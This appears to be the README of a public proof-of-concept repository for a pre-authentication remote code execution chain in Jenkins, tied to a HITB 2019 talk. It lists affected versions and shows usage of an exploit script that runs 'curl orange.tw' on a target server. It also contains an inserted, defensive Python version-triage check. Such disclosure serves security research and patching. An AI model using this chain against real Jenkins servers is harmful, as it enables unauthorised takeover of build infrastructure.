About the developer

orangetw

awesome-jenkins-rce-2019

There has been no pre-auth RCE in Jenkins since May 2017, but this is the one!

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 into a more reliable and elegant pre-auth remote code execution!

Affected list

  • ANONYMOUS_READ disabled

    • Jenkins version < 2.138
  • ANONYMOUS_READ enabled (or with a normal user account)

    • Jenkins build time < 2019-01-28

Usage

$ curl -s -I http://jenkins/ | grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

Tested on

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enabled
  • Jenkins 2.152 with ANONYMOUS_READ enabled
  • Jenkins 2.153 with ANONYMOUS_READ enabled
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48
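
For operators triaging their own instances, the affected list can be turned into a check over the `X-Jenkins` header shown under Usage. This is an added example, not code from this repository; the function names, the verdict strings and the operator-supplied `build_date` argument are assumptions made for illustration.

```python
import re
from datetime import date

FIXED_VERSION = (2, 138)               # page: "< 2.138" when ANONYMOUS_READ is disabled
FIXED_BUILD_DATE = date(2019, 1, 28)   # page: build time "< 2019-01-28" otherwise

# Constructed sample: the header lines printed in the Usage section.
SAMPLE_HEADERS = (
    "X-Jenkins: 2.137\r\n"
    "X-Jenkins-Session: 20f72c2e\r\n"
    "X-Jenkins-CLI-Port: 50000\r\n"
    "X-Jenkins-CLI2-Port: 50000\r\n"
)

def parse_version(headers_text):
    """Return the X-Jenkins version as a tuple of ints, or None if absent."""
    m = re.search(r"^X-Jenkins:[ \t]*(\d+(?:\.\d+)*)\s*$", headers_text, re.I | re.M)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def assess(headers_text, anonymous_read, build_date=None):
    """Classify an instance as 'affected', 'not-affected' or 'unknown'.

    anonymous_read: True if anonymous read is enabled or normal user accounts exist.
    build_date:     datetime.date of the Jenkins core build, supplied by the
                    operator (assumption: the page does not say where to read it).
    """
    version = parse_version(headers_text)
    if version is None:
        return "unknown"                      # header stripped by a proxy, or not Jenkins
    if version < FIXED_VERSION:
        # Below 2.138 is affected without any read access; those releases also
        # predate 2019-01-28, so the second row of the list applies as well.
        return "affected"
    if not anonymous_read:
        return "not-affected"                 # first row: needs version < 2.138
    if build_date is None:
        return "unknown"                      # second row depends on build time
    return "affected" if build_date < FIXED_BUILD_DATE else "not-affected"

if __name__ == "__main__":
    print(assess(SAMPLE_HEADERS, anonymous_read=False))
```

An "unknown" verdict means the build date has to be checked by hand before the instance can be cleared.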

Acknowledgements

Some slides from my HITB AMS 2019 talk:

[Slide images: 1.png, 2.png, 3.png]
